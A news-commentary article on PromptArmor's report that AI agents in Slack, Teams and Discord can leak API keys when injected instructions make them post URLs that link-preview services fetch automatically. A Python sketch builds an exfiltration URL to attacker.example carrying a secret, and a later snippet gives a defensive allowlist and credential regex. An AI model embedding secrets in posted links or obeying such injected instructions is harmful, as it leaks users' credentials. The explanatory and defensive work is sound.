On February 10, 2026, The Register reported that security firm PromptArmor found AI agents embedded in messaging apps can leak sensitive data through malicious URLs that get auto-fetched for link previews. The study showed that combinations of AI agents with platforms like Microsoft Teams, Slack, and Discord can be abused to exfiltrate API keys and other secrets without any user clicks.
This article aggregates reporting from 1 news source. The TL;DR is AI-generated from original reporting. Race to AGI's analysis provides editorial context on implications for AGI development.
This story is a reminder that as we move from chatbots to fully agentic systems, the attack surface explodes in unexpected ways. Here, the AI itself isn’t ‘hacked’ in a traditional sense; the mere act of an agent posting a maliciously crafted URL into a Slack or Teams channel is enough to cause secrets to leak via link previews, with zero user interaction: the platform’s preview service fetches the URL automatically, handing whatever data is encoded in it to the attacker’s server. That’s exactly the kind of brittle emergent behavior you see when you wire LLM agents into legacy systems that were never designed with them in mind.([theregister.com](https://www.theregister.com/2026/02/10/ai_agents_messaging_apps_data_leak/))
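To make the mechanism concrete, here is a minimal sketch of the pattern, not PromptArmor’s actual proof of concept; the attacker domain, secret value, and simulated preview fetcher are all illustrative assumptions:

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Hypothetical secret the agent can read from its workspace context.
API_KEY = "sk-live-EXAMPLE-0000"

# 1. Injected instructions trick the agent into embedding the secret
#    in a link it posts to the channel (attacker.example is made up).
exfil_url = "https://attacker.example/collect?" + urlencode({"k": API_KEY})
agent_message = f"Here are the docs you asked for: {exfil_url}"

# 2. The messaging platform's link-preview service auto-fetches any URL
#    it sees in a message -- no user click required. Simulated here:
def preview_fetch(message: str) -> str:
    url = next(tok for tok in message.split() if tok.startswith("http"))
    # In a real unfurler this would be an HTTP GET; the query string
    # (and the secret inside it) lands in the attacker's access logs.
    return url

fetched = preview_fetch(agent_message)
leaked = parse_qs(urlparse(fetched).query)["k"][0]
print("Attacker's server would receive:", leaked)
```

The point of the sketch is that the exfiltration channel isn’t the model at all; it’s the preview fetcher, a piece of legacy infrastructure that sits entirely outside the AI vendor’s controls.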
Strategically, this creates friction for the emerging vision of “agents that do work for you” inside enterprise messaging. If CISOs conclude that every agent integration silently circumvents network and data loss controls, they will throttle deployments or demand much heavier sandboxing and policy engines. That doesn’t stop AGI research, but it slows the operationalization of agentic systems in high‑value corporate environments.
Longer term, this kind of exploit will push infra vendors and AI platforms toward explicit “LLM‑safe” modes—agent‑aware link preview APIs, stricter URL sanitization, and richer policy languages about where agents can send which data. The labs that want their agents to be trusted co‑workers, not unintentional exfiltration bots, will have to absorb this security mindset into their product roadmaps.
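What an “LLM‑safe” posture looks like in practice is still speculative, but a first‑order control is easy to sketch: block agent‑posted links that fall outside an allowlist or that carry secret‑shaped query parameters. The domain list, regex patterns, and function name below are illustrative assumptions, not any vendor’s API:

```python
import re
from urllib.parse import urlparse, parse_qsl

ALLOWED_DOMAINS = {"docs.example.com", "github.com"}              # illustrative allowlist
SECRET_PATTERN = re.compile(r"(sk-|AKIA|ghp_)[A-Za-z0-9_-]{8,}")  # rough "looks like a credential" shapes

def is_safe_to_post(url: str) -> bool:
    """Policy check an agent gateway could run before a message reaches the channel."""
    parsed = urlparse(url)
    if parsed.hostname not in ALLOWED_DOMAINS:
        return False
    # Reject query strings that look like they smuggle credentials out.
    for _, value in parse_qsl(parsed.query):
        if SECRET_PATTERN.search(value):
            return False
    return True

print(is_safe_to_post("https://docs.example.com/page?id=42"))            # True
print(is_safe_to_post("https://attacker.example/c?k=sk-live-abc12345"))  # False
```

A check like this is crude, and pattern matching will never catch every encoding trick, which is why the article’s broader point stands: real mitigation needs agent‑aware preview APIs and policy engines, not just regexes bolted onto the output path.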


